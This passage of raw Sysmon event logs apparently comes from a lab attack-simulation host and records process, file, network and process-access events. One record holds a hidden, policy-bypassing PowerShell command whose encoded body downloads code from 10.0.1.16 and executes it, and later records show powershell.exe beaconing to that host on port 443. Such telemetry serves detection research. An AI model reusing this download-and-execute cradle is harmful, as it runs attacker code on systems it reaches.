47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035344344Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:35.568{B81B27B7-752F-613B-82B4-03000000C801}6488C:\Windows\System32\NETSTAT.EXE10.0.14393.0 (rs1_release.160715-1616)TCP/IP Netstat CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationnetstat.exe"C:\Windows\system32\NETSTAT.EXE" -anoC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=A96209882B0B2B29424E0F637D40A054,SHA256=9F070E1F4AA9AE0A5EA084FEBBD5983293E5748D0A5CC5D46098CB9271D2D508,IMPHASH=1CF0C01BB1C384844DD29F2A64D4E73F{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 23542300x800000000000000035344343Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:35.180{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B5EA3241A5A794EEFA53441AB9A4537,SHA256=88DB5C682B367193F37983BB340E0A1663534BA5661A56AF99131DCBE8234926,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344355Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:36.630{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF75fff79f.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344354Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:36.614{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0423AD23CDA6ED5F3435687A297FA591,SHA256=95BB199478707D6D29F58991BAAD7AF7976DDD37ADE1DDF9376299B4FB2A456D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344353Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:36.561{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EF191EC9AB048B46D7D0DCCABD69BF4A,SHA256=5A95E8AAE516233A187014C5732E7481E3D5C522A4142566FCE33E1F77A803CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344352Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:36.192{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD356DAE6E14FC6C22A86862DD428F0E,SHA256=46B8CBF9202F53F689921BFCB52987A743CD76E08D0C4C2F18A5981BF2CC9B06,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344358Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:10:02.808{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52670-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035344357Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:10:02.551{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52669-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035344356Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:37.210{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25F63D292EC2A6541AAA265970D8024A,SHA256=DCDC2E92907B45A39F83B0D3DEC9F810E265B68E8C6EB656992E51D4B85BD5D2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344359Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:38.244{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=211521F179AFE7AF64B4551DC38EA47E,SHA256=AA09C0E02FF32FCDFDF1632D620D0BD82F138E438279AA07B12BB1DEA88A6D2F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344362Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:39.674{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344361Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:39.674{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=E5E3C63887399118AEB57A7E19ACADD0,SHA256=DD886CA183B8BE3C8D6E7F7C291390B6ADECEF68FD92CE3BC21810730188F5B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344360Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:39.258{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0662632208DFBD1205F96029B2AA621A,SHA256=9E2697938526A7FD373CF8CF9DD098A922C0B941A74562372B36D09034087B03,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344365Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:40.857{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=439B95B16BF322814B90FB9E499A372B,SHA256=A3AD51D2482490E42C00090AA6FE05B5FAD5805C3E34EE06881FCFAE652E8ACD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344364Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:10:05.218{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52671-false10.0.1.12-8000- 23542300x800000000000000035344363Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:40.307{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=447D4FD02BC3EE85E0939F16D02EBDEA,SHA256=E4716C5CC98F718B4B0616E83D97A06F1161AB127E2EEEDC4F21B3F79E7B203D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344367Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:10:06.835{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52672-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035344366Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:41.406{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD4BC996C0675DEB2997ED461C41F5D0,SHA256=BEAA3FFD928405BAC74ED26F49B7294EEB802B0725894A0C3619D53EE247AE8A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344368Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:42.409{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AFD1A34BF7F64E045F84AE682FC514E,SHA256=75170A15339081628A7125FCD19067574AF956ADD425FCB3FC508D7F02F04CF6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344369Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:43.454{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A0052FDDF11331CC6CE4EDDEA2D81E2,SHA256=71E86D96AD28127525017898FF3B85B896B10C80F41DD0CC623A930D80492868,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344372Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:44.937{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=BF980156DC365A15464A00927D709F04,SHA256=084B1BB96709F4F67BCCF6356D800C7E3D7FDD2FC9DF3C63B0A3FFAB91F714D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344371Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:44.868{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FDF972B5DF2A4F1B93361D46D10B5797,SHA256=EAB1EECD4129E2ED9CC525ACA453A60593663E1DE3174B98D7510C1C62D1DFE1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344370Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:44.469{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD3446C6565BC3AE5C58122083FC6BB9,SHA256=E20CC875E853F2509E25F1CC35AD3CA52A74A47FC2962C4FE268A8BF9D20A5E3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344375Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:45.507{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3ACDB57B43CE63A6886C4A2069607B8,SHA256=1B8D7DE1DFE448EDF3118EFF6C1963DA77C37C7BC7FC47E9C1AAE11143CEE040,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344374Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:10:11.193{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52674-false10.0.1.12-8000- 354300x800000000000000035344373Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:10:10.847{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52673-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035344376Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:46.570{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A75E4EBCD1B44DFDEDAF13D79688F700,SHA256=FB31B411C3E267B84E0994DB6AEDB26DD0FB27A9E8A11EA177DDE0D8047A7DA5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 17141700x800000000000000035344398Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-CreatePipe2021-09-10 15:09:47.982{B81B27B7-753B-613B-84B4-03000000C801}5688\PSHost.132757601878839931.5688.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000035344397Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:47.966{B81B27B7-753B-613B-84B4-03000000C801}5688ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_s3nokyra.c5q.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344396Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:47.965{B81B27B7-753B-613B-84B4-03000000C801}5688ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_qg5yr1dq.2ei.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000035344395Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:47.937{B81B27B7-753B-613B-84B4-03000000C801}5688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_qg5yr1dq.2ei.ps12021-09-10 15:09:47.937 10341000x800000000000000035344394Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:47.922{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-753B-613B-84B4-03000000C801}5688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344393Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:47.884{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-753B-613B-84B4-03000000C801}5688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344392Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:47.884{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344391Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:47.884{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344390Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:47.884{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344389Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:47.884{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-753B-613B-84B4-03000000C801}5688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035344388Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:47.869{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344387Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:47.869{B81B27B7-753B-613B-83B4-03000000C801}19282936C:\Windows\system32\cmd.exe{B81B27B7-753B-613B-84B4-03000000C801}5688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035344386Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 